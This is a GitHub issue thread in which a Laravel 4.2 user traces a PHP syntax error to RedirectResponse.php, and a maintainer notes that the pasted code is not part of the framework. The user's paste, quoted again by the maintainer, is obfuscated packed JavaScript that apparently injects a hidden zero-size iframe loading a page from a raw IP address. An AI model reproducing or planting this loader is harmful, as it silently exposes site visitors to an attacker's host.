### ISSUE TITLE
Laravel 4.2 Redirect::to() giving error unexpected ''.replace(/^/,String)){while(c

### ISSUE THREAD

**Issue by joginder89** [laravel/framework#7557]
I am working on Laravel 4.2 (PHP Version 5.4.19) . I use 
return Redirect::to("category/list");
in Controller then it give error

syntax error, unexpected ''.replace(/^/,String)){while(c' (T_CONSTANT_ENCAPSED_STRING)

This error comes is generated by 
vendor/symfony/http-foundation/Symfony/Component/HttpFoundation/RedirectResponse.php

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|217||src|height|173|width|board||144|php|44|tag1|ram'.split('|'),0,{}))

this code is working good on localhost but give error on server.

**Comment by crynobone** [comment]
`''.replace(/^/,String)){while(c' (T_CONSTANT_ENCAPSED_STRING)`

This looks like a JavaScript error, doesn't think it related to Laravel bug.

**Comment by joginder89** [comment]
@crynobone  This error comes is generated by 
vendor/symfony/http-foundation/Symfony/Component/HttpFoundation/RedirectResponse.php

**Comment by crynobone** [comment]
@joginder89 

RedirectResponse as you can see from <https://github.com/symfony/HttpFoundation/blob/2.5/RedirectResponse.php> does have any of this code, in fact none of Laravel code has this:

```js
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('1 k=" i=\"0\" g=\"0\" j=\"0\" f=\"c://d.h.n.l/o.m\">";1 5="";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|217||src|height|173|width|board||144|php|44|tag1|ram'.split('|'),0,{}))
```

**Comment by joginder89** [comment]
@crynobone 
I was using old version of Laravel. I replace the RedirectResponse.php with you specified. Now it working fine. Thank you.
